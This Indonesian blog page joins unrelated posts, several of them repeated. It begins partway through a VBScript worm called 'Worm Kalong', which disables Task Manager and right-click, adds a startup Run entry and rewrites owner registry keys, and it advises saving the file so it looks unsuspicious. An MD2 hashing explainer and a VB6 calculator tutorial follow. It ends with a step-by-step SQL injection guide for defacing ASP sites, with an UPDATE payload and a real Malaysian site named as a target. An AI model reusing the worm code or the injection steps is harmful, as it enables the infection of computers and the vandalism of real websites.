“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”,
“1?, “REG_DWORD”
‘//–Manip – Disable klik kanan–//
kalong.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”,
“1?, “REG_DWORD”
‘//–Manip – Munculkan Pesan Setiap Windows Startup–//
kalong.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”,
“Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”
‘//–Manip – Aktif setiap Windows Startup–//
kalong.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”,
windowpath & “\batch- k4l0n6.dll.vbs “
‘//–Manip – Ubah
RegisteredOwner
dan Organization–//
kalong.regwrite
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\RegisteredOrganization”, “The Batrix”
kalong.regwrite
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\RegisteredOwner”,”Kalong”
‘//–Nah kalau kode dibawah
ini
saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//
if check
<> 1
then
Wscript.sleep 200000
end if
loop while check
<> 1
set
sd = createobject(”Wscript.shell”)
sd.run windowpath
& “\explorer.exe
/e,/select, ” & Wscript.ScriptFullname
‘Akhir
dari Kode
Save Script tersebut di Notepad dengan cara FILE > SAVE AS. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama “k4l0n6.vbs” gak usah pake( “ )dan usahakan agar tidak mencurigakan aja…
Sori ya tulisan terlalu kecil.......usaha ya baca :)
selesai deh, gamoang kan :)
moga berhasil ya :)
™onestree™
mengenal algorita MD2
Algoritma MD2 dikembngkan oleh Ron Rivest pada tahun 1989. Algoritma ini dioptimasi menggunakan komputer 8-bit. MD2 sebenarnya dispesifikasi dalam RFC 1319. Algoritma MD2 menghasilkan nilai hash yang berukuran 128-bit dan menerima masukan pesan dengan panjang yang tidak ditentukan.
Pesan yang akan dijadikan masukan untuk fungsi hash ini akan terlebih dahulu ditambah untuk kalkulasi sebenarnya. Misalkan sejumlah b-byte pesan sebagai masukan dan diharapkan untuk dapat mendapatkan intisari pesan dari pesan tersebut.
Dalam hal ini b merupakan suatu bilangan bulat sembarang yang bernilai positif, bisa juga nol, dan besarnya sembarang. Dinyatakan bahwa byte dari pesan ditulis dalam bentuk:
m_0 m_1…m_{b-1}
Ada tahap proses untuk menghasilkan intisari pesan untuk algoritma MD2, di antaranya adalah :
1. Input Padding Byte: Pesan akan ditambahkan melalui proses penambahan sehingga panjang pesan tersebut kongruen dengan 0 modulo 16. Pesan akan diperluas hingga panjangnya merupakan kelipatan 16 byte. Proses penambahan ini selalu dilakukan meskipun panjang pesan awal sebelum dilakukan penambahan sudah kongruen dengan 0 modulo 16. Penambahan dilakukan mengikuti “i” byte. Nilai “i” akan ditambahkan pada pesan sehingga panjang pesan kongruen dengan 0 modulo 16. Oleh sebab itu ukuran tambahan byte antara 1 byte sampai 16 byte. Pada tahap ini pesan hasil penambahan memiliki panjang kelipatanba16 byte. Pesan dibagi menjadi M[0...N-1] dimana N merupakan kelipatan 16.
2. Checksum Input: Sebanyak 16 byte checksum dari pesan akan ditambahkan pada hasil tahap sebelumnya. Pada langkah ini digunakan sebuah 256-byte yang dibangkitkan secara acak yang dibuat dengan nilai digit dari pi. JikaS[i] menotasikan elemen ke-i, selanjutnya 16-byte checksum tersebut AKAN dimasukan ke dalam pesan.
3. Inisialisasi Penyangga MD: Sebuah penyangga X 48-byte digunakan untuk menghasilkan intisari pesan. Nilai peyangga di inisialisasi dengan nol.
4. Proses pesan dalam blok 16-byte: Langkah ini menggunakan angka hasil pembangkitan sebanyak 256-byte yang sama dihasilkan pada proses checksum input.
Pesan yang akan dijadikan masukan untuk fungsi hash ini akan terlebih dahulu ditambah untuk kalkulasi sebenarnya. Misalkan sejumlah b-byte pesan sebagai masukan dan diharapkan untuk dapat mendapatkan intisari pesan dari pesan tersebut.
Dalam hal ini b merupakan suatu bilangan bulat sembarang yang bernilai positif, bisa juga nol, dan besarnya sembarang. Dinyatakan bahwa byte dari pesan ditulis dalam bentuk:
m_0 m_1…m_{b-1}
Ada tahap proses untuk menghasilkan intisari pesan untuk algoritma MD2, di antaranya adalah :
1. Input Padding Byte: Pesan akan ditambahkan melalui proses penambahan sehingga panjang pesan tersebut kongruen dengan 0 modulo 16. Pesan akan diperluas hingga panjangnya merupakan kelipatan 16 byte. Proses penambahan ini selalu dilakukan meskipun panjang pesan awal sebelum dilakukan penambahan sudah kongruen dengan 0 modulo 16. Penambahan dilakukan mengikuti “i” byte. Nilai “i” akan ditambahkan pada pesan sehingga panjang pesan kongruen dengan 0 modulo 16. Oleh sebab itu ukuran tambahan byte antara 1 byte sampai 16 byte. Pada tahap ini pesan hasil penambahan memiliki panjang kelipatanba16 byte. Pesan dibagi menjadi M[0...N-1] dimana N merupakan kelipatan 16.
2. Checksum Input: Sebanyak 16 byte checksum dari pesan akan ditambahkan pada hasil tahap sebelumnya. Pada langkah ini digunakan sebuah 256-byte yang dibangkitkan secara acak yang dibuat dengan nilai digit dari pi. JikaS[i] menotasikan elemen ke-i, selanjutnya 16-byte checksum tersebut AKAN dimasukan ke dalam pesan.
3. Inisialisasi Penyangga MD: Sebuah penyangga X 48-byte digunakan untuk menghasilkan intisari pesan. Nilai peyangga di inisialisasi dengan nol.
4. Proses pesan dalam blok 16-byte: Langkah ini menggunakan angka hasil pembangkitan sebanyak 256-byte yang sama dihasilkan pada proses checksum input.
Membuat Kalkulator Sederhana Menggunakan Visual Basic 6.0
Sebelum menjadi programer yang handal, Anda tentu harus belajar membuat program-program sederhana sebelum Anda membuat program yang sangat di butuhkan dalam zaman yang canggih ini. Salah satunya yaitu program kalkulator.
Program kalkulator adalah program standar yang sudah tersedia di Microsoft Windows.
Tetapi, tak ada salahnya jika kita mencoba membuat kalkulator sendiri dengan Visual Basic 6.0.
Baiklah, saya akan memberi tutorial mengenai pembuatan program kalkulator menggunakan Visual Basic 6.0.
Pertama-tama, buatlah sebuah form sesuai selera Anda, yang bentuknya kurang lebih seperti kalkulator standar Windows, seperti gambar di atas:
Untuk properties dari masing-masing objek, saya contohkan seperti dibawah ini, dengan letak
masing-masing objek disesuaikan dengan gambar diatas.
Textbox 1:
(Name) : txtDisplay
Alignment: 1-Right Justify
Text : (kosongkan)
Maxlength : 12
Command Button 1:
(Name) : cmdAngka
Index : 1
Caption : 1
Command Button 2:
(Name) : cmdAngka
Index : 2
Caption : 2
Command Button 3:
(Name) : cmdAngka
Index : 3
Caption : 3
Command Button 4:
(Name) : cmdAngka
Index : 4
Caption : 4
Command Button 5:
(Name) : cmdAngka
Index : 5
Caption : 5
Command Button 6:
(Name) : cmdAngka
Index : 6
Caption : 6
Command Button 7:
(Name) : cmdAngka
Index : 7
Caption : 7
Command Button 8:
(Name) : cmdAngka
Index : 8
Caption : 8
Command Button 9:
(Name) : cmdAngka
Index : 9
Caption : 9
Command Button 10:
(Name) : cmdAngka
Index : 0
Caption : 0
Command Button 11:
(Name) : cmdPlusMinus
Caption : +/-
Command Button 12:
(Name) : cmdKoma
Caption : .
Command Button 13:
(Name) : cmdOperator
Index : 1
Caption : +
Command Button 14:
(Name) : cmdOperator
Index : 2
Caption : -
Command Button 15:
(Name) : cmdOperator
Index : 3
Caption : x
Command Button 16:
(Name) : cmdOperator
Index : 4
Caption : /
Command Button 17:
(Name) : cmdClearEntry
Caption : CE
Command Button 18:
(Name) : cmdClear
Caption : C
Command Button 19:
(Name) : cmdSamaDengan
Caption : =
Berikutnya, Anda tinggal membuat coding dari kalkulator tersebut. Jika Anda mengikuti semua
setting properties seperti diatas, maka codingnya saya contohkan seperti ini:
Option Explicit
Private Hasil As Double
Private Const opNol = 0
Private Const opTambah = 1
Private Const opKurang = 2
Private Const opKali = 3
Private Const opBagi = 4
Private Operator As Integer
Private NilaiBaru As Boolean
' untuk menghapus karakter terakhir
Private Sub Hapus()
Dim txt As String
Dim min_len As Integer
txt = txtDisplay.Text
If Left$(txt, 1) = "-" Then
min_len = 2
Else
min_len = 1
End If
If Len(txt) > min_len Then
txtDisplay.Text = Left$(txt, Len(txt) - 1)
Else
txtDisplay.Text = "0"
End If
End Sub
' hapus angka, hasil terakhir dan operator
Private Sub cmdClear_Click()
cmdClearEntry_Click
Hasil = 0
Operator = opNol
End Sub
' hapus angka
Private Sub cmdClearEntry_Click()
txtDisplay.Text = ""
End Sub
' menambahkan koma (desimal)
Private Sub cmdKoma_Click()
If InStr(txtDisplay.Text, ".") Then
Beep
Else
If NilaiBaru Then
txtDisplay.Text = "."
NilaiBaru = False
Else
txtDisplay.Text = txtDisplay.Text & "."
End If
End If
End Sub
' Menghitung
Private Sub cmdSamaDengan_Click()
Dim HasilBaru As Double
If txtDisplay.Text = "" Then
HasilBaru = 0
Else
HasilBaru = CDbl(txtDisplay.Text)
End If
Select Case Operator
Case opNol
Hasil = HasilBaru
Case opTambah
Hasil = Hasil + HasilBaru
Case opKurang
Hasil = Hasil - HasilBaru
Case opKali
Hasil = Hasil * HasilBaru
Case opBagi
'Tidak bisa dibagi nol
If HasilBaru = 0 Then
MsgBox "Tidak bisa dibagi 0", vbOKOnly + vbCritical, "Kalku ERROR"
Call cmdClear_Click
Else
Hasil = Hasil / HasilBaru
End If
End Select
Operator = opNol
NilaiBaru = True
txtDisplay.Text = Format$(Hasil)
End Sub
' menuliskan angka
Private Sub cmdAngka_Click(Index As Integer)
If NilaiBaru Then
txtDisplay.Text = Format$(Index)
NilaiBaru = False
Else
txtDisplay.Text = _
txtDisplay.Text & Format$(Index)
End If
End Sub
' tombol tambah/kurang/bagi/kali
Private Sub cmdOperator_Click(Index As Integer)
cmdSamaDengan_Click
Operator = Index
NilaiBaru = True
End Sub
' merubah tanda +/-
Private Sub cmdPlusMinus_Click()
If NilaiBaru Then
txtDisplay.Text = "-"
ElseIf Left$(txtDisplay.Text, 1) = "-" Then
txtDisplay.Text = Right$(txtDisplay.Text, 2)
Else
txtDisplay.Text = "-" & txtDisplay.Text
End If
End Sub
' filter untuk angka saja yg dapat diketikkan
Private Sub Form_KeyPress(KeyAscii As Integer)
txtDisplay_KeyPress KeyAscii
End Sub
Private Sub Form_KeyUp(KeyCode As Integer, Shift As Integer)
txtDisplay_KeyUp KeyCode, Shift
End Sub
' supaya kursor tetap di kanan
Private Sub txtDisplay_Change()
txtDisplay.SelStart = Len(txtDisplay.Text)
End Sub
Private Sub txtDisplay_GotFocus()
txtDisplay_Change
End Sub
' untuk mengetikkan angka di keyboard
Private Sub txtDisplay_KeyPress(KeyAscii As Integer)
Dim ch As String
ch = Chr$(KeyAscii)
Select Case ch
Case "0"
cmdAngka_Click 0
Case "1"
cmdAngka_Click 1
Case "2"
cmdAngka_Click 2
Case "3"
cmdAngka_Click 3
Case "4"
cmdAngka_Click 4
Case "5"
cmdAngka_Click 5
Case "6"
cmdAngka_Click 6
Case "7"
cmdAngka_Click 7
Case "8"
cmdAngka_Click 8
Case "9"
cmdAngka_Click 9
Case "*", "x", "X"
cmdOperator_Click opKali
Case "+"
cmdOperator_Click opTambah
Case vbCrLf, vbCr, "="
cmdSamaDengan_Click
Case "-"
cmdOperator_Click opKurang
Case "."
cmdKoma_Click
Case "/"
cmdOperator_Click opBagi
Case "C", "c"
cmdClearEntry_Click
End Select
KeyAscii = 0
End Sub
' untuk ketikan angka di numpad
Private Sub txtDisplay_KeyUp(KeyCode As Integer, Shift As Integer)
Select Case KeyCode
Case vbKeyNumpad0
cmdAngka_Click 0
Case vbKeyNumpad1
cmdAngka_Click 1
Case vbKeyNumpad2
cmdAngka_Click 2
Case vbKeyNumpad3
cmdAngka_Click 3
Case vbKeyNumpad4
cmdAngka_Click 4
Case vbKeyNumpad5
cmdAngka_Click 5
Case vbKeyNumpad6
cmdAngka_Click 6
Case vbKeyNumpad7
cmdAngka_Click 7
Case vbKeyNumpad8
cmdAngka_Click 8
Case vbKeyNumpad9
cmdAngka_Click 9
Case vbKeyMultiply
cmdOperator_Click opKali
Case vbKeyAdd
cmdOperator_Click opTambah
Case vbKeySeparator
cmdSamaDengan_Click
Case vbKeySubtract
cmdOperator_Click opKurang
Case vbKeyDivide
cmdOperator_Click opBagi
Case vbKeyDecimal
cmdKoma_Click
Case vbKeyBack, vbKeyDelete
Hapus
End Select
KeyCode = 0
End Sub
Program kalkulator adalah program standar yang sudah tersedia di Microsoft Windows.
Tetapi, tak ada salahnya jika kita mencoba membuat kalkulator sendiri dengan Visual Basic 6.0.
Baiklah, saya akan memberi tutorial mengenai pembuatan program kalkulator menggunakan Visual Basic 6.0.
Pertama-tama, buatlah sebuah form sesuai selera Anda, yang bentuknya kurang lebih seperti kalkulator standar Windows, seperti gambar di atas:
Untuk properties dari masing-masing objek, saya contohkan seperti dibawah ini, dengan letak
masing-masing objek disesuaikan dengan gambar diatas.
Textbox 1:
(Name) : txtDisplay
Alignment: 1-Right Justify
Text : (kosongkan)
Maxlength : 12
Command Button 1:
(Name) : cmdAngka
Index : 1
Caption : 1
Command Button 2:
(Name) : cmdAngka
Index : 2
Caption : 2
Command Button 3:
(Name) : cmdAngka
Index : 3
Caption : 3
Command Button 4:
(Name) : cmdAngka
Index : 4
Caption : 4
Command Button 5:
(Name) : cmdAngka
Index : 5
Caption : 5
Command Button 6:
(Name) : cmdAngka
Index : 6
Caption : 6
Command Button 7:
(Name) : cmdAngka
Index : 7
Caption : 7
Command Button 8:
(Name) : cmdAngka
Index : 8
Caption : 8
Command Button 9:
(Name) : cmdAngka
Index : 9
Caption : 9
Command Button 10:
(Name) : cmdAngka
Index : 0
Caption : 0
Command Button 11:
(Name) : cmdPlusMinus
Caption : +/-
Command Button 12:
(Name) : cmdKoma
Caption : .
Command Button 13:
(Name) : cmdOperator
Index : 1
Caption : +
Command Button 14:
(Name) : cmdOperator
Index : 2
Caption : -
Command Button 15:
(Name) : cmdOperator
Index : 3
Caption : x
Command Button 16:
(Name) : cmdOperator
Index : 4
Caption : /
Command Button 17:
(Name) : cmdClearEntry
Caption : CE
Command Button 18:
(Name) : cmdClear
Caption : C
Command Button 19:
(Name) : cmdSamaDengan
Caption : =
Berikutnya, Anda tinggal membuat coding dari kalkulator tersebut. Jika Anda mengikuti semua
setting properties seperti diatas, maka codingnya saya contohkan seperti ini:
Option Explicit
Private Hasil As Double
Private Const opNol = 0
Private Const opTambah = 1
Private Const opKurang = 2
Private Const opKali = 3
Private Const opBagi = 4
Private Operator As Integer
Private NilaiBaru As Boolean
' untuk menghapus karakter terakhir
Private Sub Hapus()
Dim txt As String
Dim min_len As Integer
txt = txtDisplay.Text
If Left$(txt, 1) = "-" Then
min_len = 2
Else
min_len = 1
End If
If Len(txt) > min_len Then
txtDisplay.Text = Left$(txt, Len(txt) - 1)
Else
txtDisplay.Text = "0"
End If
End Sub
' hapus angka, hasil terakhir dan operator
Private Sub cmdClear_Click()
cmdClearEntry_Click
Hasil = 0
Operator = opNol
End Sub
' hapus angka
Private Sub cmdClearEntry_Click()
txtDisplay.Text = ""
End Sub
' menambahkan koma (desimal)
Private Sub cmdKoma_Click()
If InStr(txtDisplay.Text, ".") Then
Beep
Else
If NilaiBaru Then
txtDisplay.Text = "."
NilaiBaru = False
Else
txtDisplay.Text = txtDisplay.Text & "."
End If
End If
End Sub
' Menghitung
Private Sub cmdSamaDengan_Click()
Dim HasilBaru As Double
If txtDisplay.Text = "" Then
HasilBaru = 0
Else
HasilBaru = CDbl(txtDisplay.Text)
End If
Select Case Operator
Case opNol
Hasil = HasilBaru
Case opTambah
Hasil = Hasil + HasilBaru
Case opKurang
Hasil = Hasil - HasilBaru
Case opKali
Hasil = Hasil * HasilBaru
Case opBagi
'Tidak bisa dibagi nol
If HasilBaru = 0 Then
MsgBox "Tidak bisa dibagi 0", vbOKOnly + vbCritical, "Kalku ERROR"
Call cmdClear_Click
Else
Hasil = Hasil / HasilBaru
End If
End Select
Operator = opNol
NilaiBaru = True
txtDisplay.Text = Format$(Hasil)
End Sub
' menuliskan angka
Private Sub cmdAngka_Click(Index As Integer)
If NilaiBaru Then
txtDisplay.Text = Format$(Index)
NilaiBaru = False
Else
txtDisplay.Text = _
txtDisplay.Text & Format$(Index)
End If
End Sub
' tombol tambah/kurang/bagi/kali
Private Sub cmdOperator_Click(Index As Integer)
cmdSamaDengan_Click
Operator = Index
NilaiBaru = True
End Sub
' merubah tanda +/-
Private Sub cmdPlusMinus_Click()
If NilaiBaru Then
txtDisplay.Text = "-"
ElseIf Left$(txtDisplay.Text, 1) = "-" Then
txtDisplay.Text = Right$(txtDisplay.Text, 2)
Else
txtDisplay.Text = "-" & txtDisplay.Text
End If
End Sub
' filter untuk angka saja yg dapat diketikkan
Private Sub Form_KeyPress(KeyAscii As Integer)
txtDisplay_KeyPress KeyAscii
End Sub
Private Sub Form_KeyUp(KeyCode As Integer, Shift As Integer)
txtDisplay_KeyUp KeyCode, Shift
End Sub
' supaya kursor tetap di kanan
Private Sub txtDisplay_Change()
txtDisplay.SelStart = Len(txtDisplay.Text)
End Sub
Private Sub txtDisplay_GotFocus()
txtDisplay_Change
End Sub
' untuk mengetikkan angka di keyboard
Private Sub txtDisplay_KeyPress(KeyAscii As Integer)
Dim ch As String
ch = Chr$(KeyAscii)
Select Case ch
Case "0"
cmdAngka_Click 0
Case "1"
cmdAngka_Click 1
Case "2"
cmdAngka_Click 2
Case "3"
cmdAngka_Click 3
Case "4"
cmdAngka_Click 4
Case "5"
cmdAngka_Click 5
Case "6"
cmdAngka_Click 6
Case "7"
cmdAngka_Click 7
Case "8"
cmdAngka_Click 8
Case "9"
cmdAngka_Click 9
Case "*", "x", "X"
cmdOperator_Click opKali
Case "+"
cmdOperator_Click opTambah
Case vbCrLf, vbCr, "="
cmdSamaDengan_Click
Case "-"
cmdOperator_Click opKurang
Case "."
cmdKoma_Click
Case "/"
cmdOperator_Click opBagi
Case "C", "c"
cmdClearEntry_Click
End Select
KeyAscii = 0
End Sub
' untuk ketikan angka di numpad
Private Sub txtDisplay_KeyUp(KeyCode As Integer, Shift As Integer)
Select Case KeyCode
Case vbKeyNumpad0
cmdAngka_Click 0
Case vbKeyNumpad1
cmdAngka_Click 1
Case vbKeyNumpad2
cmdAngka_Click 2
Case vbKeyNumpad3
cmdAngka_Click 3
Case vbKeyNumpad4
cmdAngka_Click 4
Case vbKeyNumpad5
cmdAngka_Click 5
Case vbKeyNumpad6
cmdAngka_Click 6
Case vbKeyNumpad7
cmdAngka_Click 7
Case vbKeyNumpad8
cmdAngka_Click 8
Case vbKeyNumpad9
cmdAngka_Click 9
Case vbKeyMultiply
cmdOperator_Click opKali
Case vbKeyAdd
cmdOperator_Click opTambah
Case vbKeySeparator
cmdSamaDengan_Click
Case vbKeySubtract
cmdOperator_Click opKurang
Case vbKeyDivide
cmdOperator_Click opBagi
Case vbKeyDecimal
cmdKoma_Click
Case vbKeyBack, vbKeyDelete
Hapus
End Select
KeyCode = 0
End Sub
deface web .asp tanpa login
sebelumnya gw mau kasih tau,kalo ane dapat ilmu ini dari CN-Zine4 itu majalah dari codenesia gan,,hehe,,,
terima kasih buat team CN-zine4, teman2 bisa lihat salah satu implementasi dari teknik ini,
atau bisa langsung diliat di http://www.kbi.com.my/
(sssssstttttt,,,web malay loh!!)hahahha...
gue share aja ya tata tertib acaranya,(loh,kok kayak ceremonial)..
maksud ane tata cara nya:
ok langsung aja ya :
1. klik salah satu pesan dibawah postingan ini
2. buka web asp yang mau kamu deface...
misal: http://contohweb.com.my/ViewNews.asp?RefNo=42
3. tambahkan having 1=1 didepannya,,,jadinya= http://www.contohweb.com.my/berita.asp?id=42 having 1=1
4. maka akan muncul error seperti ini:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'News.NsID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/ViewNews.asp, line 8
5. ganti url nya menjadi http://www.contohweb.com.my/berita.asp?id=42 group by News.NsID having 1=1 (perhatikan perubahan url,)
6. akan muncul error berikut:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'News.NsDate' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/ViewNews.asp, line 8
7. ganti url-nya menjadi: http://www.contohweb.com.my/berita.asp?id=42 group by News.NsID,News.NsDate having 1=1 (perhatikan perubahan url)
8. akan muncul error seperti ini:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'News.NsTitle' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/ViewNews.asp, line 8
9. nah,dapt tuh column and table nya = nstitle dan news
10. selanjutnya langkah injeksi
11. gunakan url berikut: http://www.contohweb.com.my/berita.asp?id=42 update news set NsTitle='Hacked by namakamu';--
12. refresh,jadi deh,...
terima kasih buat team CN-zine4, teman2 bisa lihat salah satu implementasi dari teknik ini,
atau bisa langsung diliat di http://www.kbi.com.my/
(sssssstttttt,,,web malay loh!!)hahahha...
gue share aja ya tata tertib acaranya,(loh,kok kayak ceremonial)..
maksud ane tata cara nya:
ok langsung aja ya :
1. klik salah satu pesan dibawah postingan ini
2. buka web asp yang mau kamu deface...
misal: http://contohweb.com.my/ViewNews.asp?RefNo=42
3. tambahkan having 1=1 didepannya,,,jadinya= http://www.contohweb.com.my/berita.asp?id=42 having 1=1
4. maka akan muncul error seperti ini:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'News.NsID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/ViewNews.asp, line 8
5. ganti url nya menjadi http://www.contohweb.com.my/berita.asp?id=42 group by News.NsID having 1=1 (perhatikan perubahan url,)
6. akan muncul error berikut:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'News.NsDate' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/ViewNews.asp, line 8
7. ganti url-nya menjadi: http://www.contohweb.com.my/berita.asp?id=42 group by News.NsID,News.NsDate having 1=1 (perhatikan perubahan url)
8. akan muncul error seperti ini:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'News.NsTitle' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/ViewNews.asp, line 8
9. nah,dapt tuh column and table nya = nstitle dan news
10. selanjutnya langkah injeksi
11. gunakan url berikut: http://www.contohweb.com.my/berita.asp?id=42 update news set NsTitle='Hacked by namakamu';--
12. refresh,jadi deh,...
Langganan:
Postingan (Atom)
